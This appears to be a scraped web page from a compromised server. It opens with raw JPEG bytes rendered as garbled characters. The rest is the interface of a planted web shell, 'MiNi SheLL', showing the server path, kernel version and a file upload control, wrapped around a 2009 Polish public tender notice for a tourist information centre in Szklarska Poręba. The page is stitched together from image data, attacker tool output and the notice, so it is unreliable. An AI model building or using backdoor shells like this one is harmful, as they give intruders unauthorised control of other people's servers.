JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090826/140749-N-2009.html

<p class="kh_header"><b>Szklarska Poręba: Opracowanie dokumentacji projektowo- kosztorysowej na zadanie pn. Budowa budynku informacyjno- usługowego i małej architektury łącznie z infrastrukturą techniczną na Skwerku Radiowej Trójki         w Szklarskiej Porębie</b><br>
<b>Numer ogłoszenia: 140749 - 2009; data zamieszczenia: 26.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 075 7547712, faks 075 7547724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szklarskaporeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo- kosztorysowej na zadanie pn. Budowa budynku informacyjno- usługowego i małej architektury łącznie z infrastrukturą techniczną na Skwerku Radiowej Trójki         w Szklarskiej Porębie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Teren objęty zamierzeniem inwestycyjnym znajduje się w centralnym miejscu Miasta ,u zbiegu ul. Jedności Narodowej i ul. 1.Maja w Szklarskiej Porębie. Południową granicę działki tzw. _Skweru Radiowej Trójki_wyznacza rzeka Kamienna. Aktualnie skwer stanowi miejsce spotkań i miejsce organizacji atrakcyjnych imprez, na którym zlokalizowane są stragany, scena, obiekt usługowy (gastronomiczny) wraz z istniejącym szaletem, aleja _radiowych ust_, obelisk, nieczynna fontanna, elementy małej architektury  i plac zabaw - lokalizacja zamierzenia inwestycyjnego została zaznaczona na nieaktualnej mapie sytuacyjno-wysokościowej stanowiącej załącznik Nr 1.

Dla terenów tzw. _Nowego Centrum_ w Szklarskiej Porębie jest Projekt miejscowego planu zagospodarowania przestrzennego.

Zamawiający  posiada Projekt decyzji o warunkach zabudowy.
Przy zagospodarowaniu działki należy wykorzystać istniejące, naturalne nachylenie terenu w kierunku rzeki Kamiennej i zwrócić skwer _twarzą_ do rzeki.
Planowana zabudowa winna zamykać istniejący kwartał od strony ciągów ulic Jedności Narodowej i 1.Maja. 
Wejścia na teren winny podkreślać charakter miejsca i podnosić jego estetykę. 
Planując inwestycję należy przewidzieć budowę budynku usługowego spełniającego funkcję Regionalnego Centrum Turystyki. W obiekcie należy przewidzieć pomieszczenia kawiarni lub baru _Bistro_, informację turystyczną wraz z pomieszczeniami konferencyjnymi i galerią , pasaż wraz ze schodami prowadzącymi na 



poziom skweru, tarasy w części zadaszone stanowiące punkty widokowe i punkty handlowe (typu _sprzedaż pamiątek_) . W obrębie terenu należy zaplanować budowę fontanny ( w miejscu istniejącej lub wskazanej przez projektanta)wraz z zielenią i miejscami odpoczynku, plac zabaw, zieleń wysoką i niską ,punkty reklamowe (wskazane bilbordy), aleję _radiowych ust_, lokalizację obelisku i siedziska oraz zabezpieczenia przy rzece.

Zaproponowane  rozwiązania winny umożliwić   dostęp osobom niepełnosprawnym. 

Ważnym elementem projektowanego zagospodarowania winno być oświetlenie terenu  i obiektów (fontanny). 

Inwestycja wymaga wykonania przyłączy do projektowanych obiektów - w posiadaniu Zamawiającego są zapewnienia dostawy mediów.

2.Wymagane  wskaźniki powierzchniowe i kubaturowe dla całego przedsięwzięcia inwestycyjnego:

-powierzchnia zabudowy około 500 m2
-kubatura: maksymalnie  4000 m3
-budynek maksymalnie o 3 kondygnacjach (w tym-  poddasze użytkowe), częściowo zagłębiony od strony 
   ul. Jedności Narodowej i  dostępny z poziomu ul. Jedności Narodowej.

3.Założenia funkcjonalno-użytkowe:

Istniejące obiekty o konstrukcji drewnianej (obiekt gastronomiczny o pow. użytkowej 170 m2, pow. zabudowy 230 m2 i kubaturze 765 m3) oraz elementy małej architektury- przewidziane są do rozbiórki, która jest w gestii aktualnego dzierżawcy. Planuje się rozbiórkę murowanego, parterowego szaletu ( pow. zabudowy 60 m2)         i  zadaszonej sceny, a także przeniesienie (zmiana usytuowania w obrębie terenu objętego opracowaniem) alei _radiowych ust_.
 Realizacja inwestycji wiąże się z likwidacją kolizji z siecią gazową, siecią energetyczną średniego napięcia     i zmianą przebiegu istniejącego przyłącza wodociągowego. 

Ze względu na możliwość otrzymania dofinansowania środkami zewnętrznymi- przedsięwzięcie inwestycyjne realizowane będzie co najmniej w dwóch etapach, z czego I etap stanowić musi  planowane na około         230 m2 pow. zabudowy - Regionalne Centrum Informacji Turystycznej wraz z zagospodarowania terenu  przy założeniu  pozostawienia rezerwy terenowej pod obiekty kubaturowe objęte pozostałymi etapami. 
Propozycja pozostałego etapowania  przedsięwzięcia finansowanego już w całości środkami z budżetu Gminy -  należy do projektanta.

Regionalne Centrum Informacji Turystycznej musi pełnić trzy funkcje:

- informacyjną     -  informacja turystyczna o mieście i regionie,
- konferencyjną    - miejsce spotkań lokalnej społeczności z polskiej i czeskiej strony Karkonoszy, miejsce 
                               konferencji prasowych, miejsce spotkań  organizacji turystycznych,
- wystawiennicza - okresowe galerie i prezentacje artystów polskich i  czeskich. 

Stąd, niezbędne jest rozplanowanie pomieszczeń:

na poziomie 0

- informacja turystyczna  z wydzielonymi samodzielnymi dwoma (2) stanowiskami pracy ( miejsce łatwo dostępne dla turystów z możliwością umieszczenia tam regałów lub półek, na których leżą foldery, ulotki reklamowe, itp.- bez barier architektonicznych,
-  minimalne ( tj. na poziomie spełnienia przepisów)   zaplecze kuchenne,
-  magazyn na potrzeby informacji turystycznej,
-  galeria - niezależne pomieszczenie nie kolidujące z pracą informacji turystycznej,
-  magazyn na potrzeby galerii,
-  w.c.  w pomieszczeniu galerii i informacji turystycznej,




na poziomie 1

-  sala wielofunkcyjna na 30 osób ( konferencje , spotkania, itp.),
-  kuchnia w pełni przystosowana do obsługi konferencji,
-  zaplecze wraz z toaletami,
-  wydzielone pomieszczenie dla referatu promocji z czterema ( 4) samodzielnymi stanowiskami pracy,
-  pomieszczenie dla kierownika referatu promocji,
- samodzielne zaplecze dla referatu promocji 
   (zaplecze kuchenne i szatnia -  minimalne, tj. na poziomie  spełnienia przepisów   ,

4.Zakres rzeczowy 

- w ramach opracowania dokumentacji projektowej należy:

1- uzyskać mapę do celów projektowych 

[ ustawa z 07.07.1994 -Prawo Budowlane (tj. z 2006 r.Dz. U., Nr 156 , poz.1118, z późn.zm.) art.34.            ust. 3.pkt 1)  projekt zagospodarowania działki lub terenu, sporządzony na aktualnej mapie, obejmujący: określenie granic działki lub terenu, usytuowanie, obrys i układy istniejących i projektowanych obiektów budowlanych, sieci uzbrojenia terenu, sposób odprowadzania lub oczyszczania ścieków, układ komunikacyjny i układ zieleni, ze wskazaniem charakterystycznych elementów, wymiarów, rzędnych i wzajemnych odległości obiektów, w nawiązaniu do istniejącej i projektowanej zabudowy terenów sąsiednich oraz rozporządzenie Ministra Infrastruktury z 03 lipca 2003.  w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.2003, Nr 120, poz.1133)  - rozdział 3. ]

2- uzyskać warunki techniczne dostawy mediów ,


3- sporządzić szkic- koncepcję  proponowanego rozwiązania urbanistyczno-architektonicznego, który po uzgodnieniu z Zamawiającym pozwoli na przystąpienie do dalszych prac projektowych.

4- opracować projekt budowlany , oddzielnie  dla I etapu i oddzielnie dla pozostałych etapów - w stopniu uszczegółowienia pozwalającym na opracowanie kosztorysu inwestorskiego  dla I etapu i pozostałych etapów oraz realizacji zadania bez konieczności sporządzania projektu wykonawczego. 

Projekt budowlany musi dodatkowo posiadać klauzulę o odpowiedzialności zawodowej za skutki przyjęcia      
złych rozwiązań projektowych .

Projekt budowlany należy opracować - w 5 egzemplarzach w wersji papierowej +  w 2 egzemplarzach na
nośniku  elektronicznym oraz dodatkowo na twardym podkładzie kolorystykę elewacji ( w formacie minimum A-2) .

Projekt budowlany musi spełniać co najmniej wymogi określone w ustawie z 07.07.1994 -Prawo Budowlane -  art.34.,  w tym w ust.3 ppkt 3)  -  stosownie do potrzeb, jak również odpowiadać wymogom  rozporządzenia 
Ministra Infrastruktury z 03.07. 2003.  w sprawie szczegółowego zakresu i formy projektu budowlanego 
(Dz.U. z 2003, Nr 120, poz.1133, ze zmianami )  oraz uwzględniać warunki wynikające z uzgodnień                z dostawcami mediów .

5- uzyskać wszystkie niezbędne uzgodnienia projektu budowlanego , w tym Decyzję o środowiskowych uwarunkowaniach i Ocenę oddziaływania na środowisko (NATURA 2000)  oraz inne  warunkujące wydanie pozwolenia na budowę z podziałem na I etap i pozostałe etapy ,

Szklarska Poręba  objęta  jest strefą -NATURA 2000  w granicach administracyjnych miasta.

6- opracować specyfikację techniczną wykonania i odbioru robót  uszczegóławiającą zapisy Projektu budowlanego i zawierającą istotne wymagania materiałowe, standardu, jakości, sposobu wykonania robót budowlanych oraz określenia sposobu odbioru tych robót  - oddzielnie  dla I etapu i oddzielnie dla pozostałych etapów. 
     
Specyfikację techniczną wykonania i odbioru robót należy sporządzić  zgodnie z wymogami rozporządzenia Ministra Infrastruktury z 02.09.2004r.  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno -użytkowego  -  w 1 egzemplarzu w wersji papierowej + 1 egzemplarz na nośniku elektronicznym ;

7- opracować kosztorys inwestorski do ustalenia szacunkowej wartości inwestycji z klauzulą                             o odpowiedzialności sporządzającego kosztorys za skutki błędnego ustalenia szacunkowej wartości inwestycji -  oddzielnie  dla I etapu i oddzielnie dla pozostałych etapów.

W części kosztowej dotyczącej I etapu należy ująć wycenę całego zagospodarowania terenu  przy założeniu  pozostawienia rezerwy terenowej pod obiekty kubaturowe objęte pozostałymi etapami. 

     
Kosztorys inwestorski winien być sporządzony zgodnie z rozporządzeniem Ministra Infrastruktury                    z 18.05.2004 r.  w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. 2004, Nr 130, poz.1389)  -  w 1 egzemplarzu w  wersji papierowej + 1 egzemplarz na nośniku elektronicznym.

8- sporządzić specyfikację sprzętu i urządzeń stanowiących wyposażenie obiektu realizowanego jako  I etap.

 W/w specyfikacja musi zawierać rubryki z określeniem: rodzaju/nazwy, typu, głównych parametrów technicznych, miejsca usytuowania ( określenie pomieszczenia), ilości, odniesienia do cen jednostkowych      w formie kosztorysu.

9- złożyć , w imieniu Zamawiającego , wniosek o zatwierdzenie dokumentacji projektowej i wydania decyzji- pozwolenia na budowę - oddzielnie  dla I etapu i oddzielnie dla pozostałych etapów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.20.00-6, 71.24.50.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie jest wymagane wniesienie wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:

1- posiadać uprawnienia do wykonania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia

2- posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

W szczególności wykonawca musi wskazać do uczestniczenia w wykonaniu niniejszego zamówienia :


a) - osoby posiadające uprawnienia budowlane ( w niżej wymienionym rozumieniu ) do projektowania 
w specjalności: architektonicznej, konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji              i urządzeń cieplnych , wentylacyjnych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 

przy czym:

od osoby wskazanej jako Główny Projektant wymagane jest posiadanie tytułu mgr inż. architekta , co najmniej 5 lat doświadczenia zawodowego jako projektanta -w specjalności architektonicznej lub w specjalności konstrukcyjno-budowlanej, w tym jako projektanta wiodącego przynajmniej przy jednej (1) realizacji charakterem zbliżonym do przedmiotu zamówienia.

od pozostałych Projektantów - co najmniej 3 lat doświadczenia zawodowego jako projektanta                        w reprezentowanej przez siebie branży,  

b)   kosztorysantów mających, co najmniej dwuletnie (2) doświadczenie zawodowe jako kosztorysanci, w tym wykonali, co najmniej trzy kosztorysy w reprezentowanej przez siebie branży.

Przez doświadczenie zawodowe należy rozumieć okres od daty uzyskania uprawnień do daty upływu składania ofert.

Przez uprawnienia budowlane  należy rozumieć: 

 - uprawnienia budowlane w specjalności architektonicznej bez ograniczeń,
 - uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń,
 - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych ,
   wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
 - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń 
   elektrycznych i elektroenergetycznych bez ograniczeń,

zgodnie z art.12, art.12a ust.1 oraz art.14 ust.1 ustawy z dnia 07.07.1994 r. Prawo budowlane 
(Dz. U. z 2003 r., Nr 207, poz.2016 z późn.zm. ) lub odpowiadające im ważne uprawnienia budowlane do projektowania , które zostały wydane na podstawie wcześniej obowiązujących przepisów.


3-  znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. 

4-  nie podlegać wykluczeniu z postępowania na podstawie art. 24 u.p.z.p. 
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana systemem jedynkowym wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełniania powyższych warunków wykonawcy zobowiązani są przedłożyć następujące dokumenty: 

ad. 1-

 - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony (e) nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich
 

ad. 2- 

 - wykaz  osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia - niezbędnych  do wykonania zamówienia , a także zakresu wykonywanych czynności  przez te osoby   - sporządzony według wzoru stanowiącego załącznik nr 3 do IDW.

- pisemne zobowiązania  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, wykonawca wskazał osoby, którymi będzie dysponował.
 
Do wykazu należy dołączyć: 
-dokumenty stwierdzające, że osoby te posiadają wymagane uprawnienia, 
-aktualne na dzień upływu terminu składania ofert zaświadczenia potwierdzające przynależność do  stosownej Izby zawodowej. 

Wykonawca może wykazać kwalifikacje zawodowe, wykształcenie i doświadczenie , dotyczy to szczególnie osób wymienionych jako:  Główny Projektant, Projektant,  Kosztorysant,  załączając do Oferty proponowany  przez Zamawiającego wzór CV stanowiący załącznik 3.1  do IDW.

Należy pamiętać, że informacje dotyczące tych osób są konieczne do potwierdzenia spełnienia warunków uczestnictwa w postępowaniu , o którym mowa w punkcie 9.1.2-

W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie. 

ad. 4-

 - oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 do IDW,  o spełnianiu warunków udziału w postępowaniu .

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców w/w dokument może być złożony przez każdego z wykonawców składających ofertę wspólną albo może być złożony wspólnie, lecz w takim wypadku oświadczenie musi być podpisane przez pełnomocnika albo przez upoważnionych przedstawicieli każdego z wykonawców składających ofertę wspólną.

2.  Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z  19 maja 2006 r.  (Dz. U. Nr  87,
poz. 605, z późniejszymi  zmianami ) w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane, to jeżeli 
wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
zamiast dokumentu, o których mowa powyżej w pkt. 9.2. ad. 1-, składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że  nie otwarto jego likwidacji ani nie ogłoszono upadłości- wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.   Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski , sporządzonym lub poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.szklarskaporeba.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie ze strony internetowej Zamawiającego : www.bip.szklarskaporeba.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2009 godzina 09:00, miejsce: siedziba Zamawiającego: Urząd Miasta Szklarska Poręba , ul . M. Buczka 2 , 58-580 Szklarska Poręba lub osobiście - w Biurze Obsługi Interesantów- parter ( adres j. w.).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com